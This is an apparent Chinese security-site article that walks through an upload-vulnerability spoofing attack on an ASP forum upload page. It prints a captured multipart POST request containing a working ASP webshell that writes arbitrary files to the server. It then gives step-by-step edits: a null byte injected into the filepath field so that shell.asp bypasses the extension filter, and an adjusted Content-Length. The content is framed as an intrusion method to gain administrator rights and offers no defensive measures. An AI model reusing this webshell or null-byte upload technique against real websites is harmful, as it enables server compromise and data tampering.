解析上传漏洞欺骗技术

安全 黑客攻防
先我们要获得客户端和服务器之间传递的数据,事先准备好一个ASP木马准备上传,当然不可能成功,我们要的就是这中间我们向服务器提交的数据。一般用WsockExpert来获得数据,由于数据太多只能把关键部分发出来

实际上网络中存在着很多的漏洞,通过这些漏洞的利用黑客就可能会入侵网站的服务器,取得管理员权限。其中不少的程序都存在着上传漏洞,通过上传漏洞黑客入侵者便可以上传一个ASP木马,然后通过上传漏洞欺骗技术来达到自己入侵的目的。接下来本篇文章就讲分析一下上传漏洞欺骗的具体原理。

POST /bbs/upfile.asp HTTP/1.1

……. 省略了N多没用信息

 

  1. Content-Length: 1792  
  2. Connection: Keep-Alive  
  3. Cache-Control: no-cache  
  4. Cookie: ASPSESSIONIDQQTDTATD=NLDNNHPDJEEHOFNFBAGPOJKN 
  5. -----------------------------7d52191850242  
  6. Content-Disposition: form-data; name="filepath" 
  7.  
  8. uploadFace  
  9. -----------------------------7d52191850242  
  10. Content-Disposition: form-data; name="act" 
  11.  
  12. upload  
  13. -----------------------------7d52191850242  
  14. Content-Disposition: form-data; name="file1"
  15. filename="E:\木马\asp\shell.asp" 
  16. Content-Type: text/plain  
  17.  
  18. <% dim objFSO %>  
  19. <% dim fdata %>  
  20. <% dim objCountFile %>  
  21. <% on error resume next %>  
  22. <% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>  
  23. <% if Trim(request("syfdpath"))<>"" then %>  
  24. <% fdata = request("cyfddata") %>  
  25. <% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>  
  26. <% objCountFile.Write fdata %>  
  27. <% if err =0 then %>  
  28. <% response.write "<font color=red><h2>成功!</h2><font>" %>  
  29. <% else %>  
  30. <% response.write "<font color=red><h1>失败!</h1></font>" %>  
  31. <% end if %>  
  32. <% err.clear %>  
  33. <% end if %>  
  34. <% objCountFile.Close %>  
  35. <% Set objCountFile=Nothing %>  
  36. <% Set objFSO = Nothing %>  
  37. <% Response.write "<form action='' method=post>" %>  
  38. <% Response.write "保存留言<font color=red>如D:\web\x.asp</font>" %>  
  39. <% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>  
  40. <% Response.Write "<br>" %>  
  41. <% Response.write "地址来自" %>  
  42. <% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>  
  43. <% Response.write "<br>" %>  
  44. <% Response.write "你的留言:" %>  
  45. <% Response.write "<textarea name=cyfddata
  46. cols=80 rows=10 width=32></textarea>" %>  
  47. <% Response.write "<input type=submit value=sky!!>" %>  
  48. <% Response.write "</form>" %> 

-----------------------------7d52191850242

Content-Disposition: form-data; name="fname"

E:\木马\asp\shell.asp

-----------------------------7d52191850242

Content-Disposition: form-data; name="Submit"

上传
-----------------------------7d52191850242--

传递的信息我们获取了,下面就来修改下达到上传漏洞欺骗目的。主要修改一下几点:

1.Content-Disposition: form-data; name="file1"; filename="E:\木马\asp\shell.asp"

2.Content-Disposition: form-data; name="fname"

E:\木马\asp\shell.asp

3.最重要的地方是Content-Disposition: form-data; name="filepath"下面的值要修改下。我们修改成uploadFace\shell.asp后面怎么加一个空字符呢?用UltraEdit是个好方法,用16进制编辑,(因为'\0'这个字符也占一个位置,所以我们先打入一空格,然后再在UltraEdit(用Ctrl+H转换到16进制模式下)里将就空格符的20改成00)。

4.还有一个地方也要修改,就是这句Content-Length: 1792表示提交数据的字符个数。

如果你修改了filepath的值那么这个长度1792也要变换,一个字母或者数字的长度就是1,不要忘记最后面那个空格那个也算1。

【编辑推荐】

  1. 亲身体验MS07-029漏洞入侵
  2. 解析系统泄露密码入侵攻击
  3. 经典后门实例之线程插入后门
  4. 经典后门实例之扩展后门
  5. 通过数据库下载漏洞发起网络攻击

 

责任编辑:张启峰 来源: 安全在线
相关推荐

2013-04-01 10:12:39

2010-09-13 16:24:39

2011-04-18 13:33:07

2009-12-17 10:14:14

2019-10-31 08:43:43

ICMPARP协议ARP欺骗

2011-07-13 13:43:30

2015-12-01 10:43:55

2013-09-04 10:41:08

2009-12-28 12:16:54

2012-04-12 16:05:50

2009-07-15 20:44:17

2010-09-16 16:06:37

2011-04-06 10:23:46

2010-08-03 11:08:57

2013-11-29 15:41:08

解析漏洞ApacheApache解析漏洞

2010-12-05 19:36:32

2018-10-29 07:13:45

2019-11-20 15:18:15

欺骗技术网络安全基础设施安全

2013-06-25 10:11:18

2011-04-06 10:31:53

点赞
收藏

51CTO技术栈公众号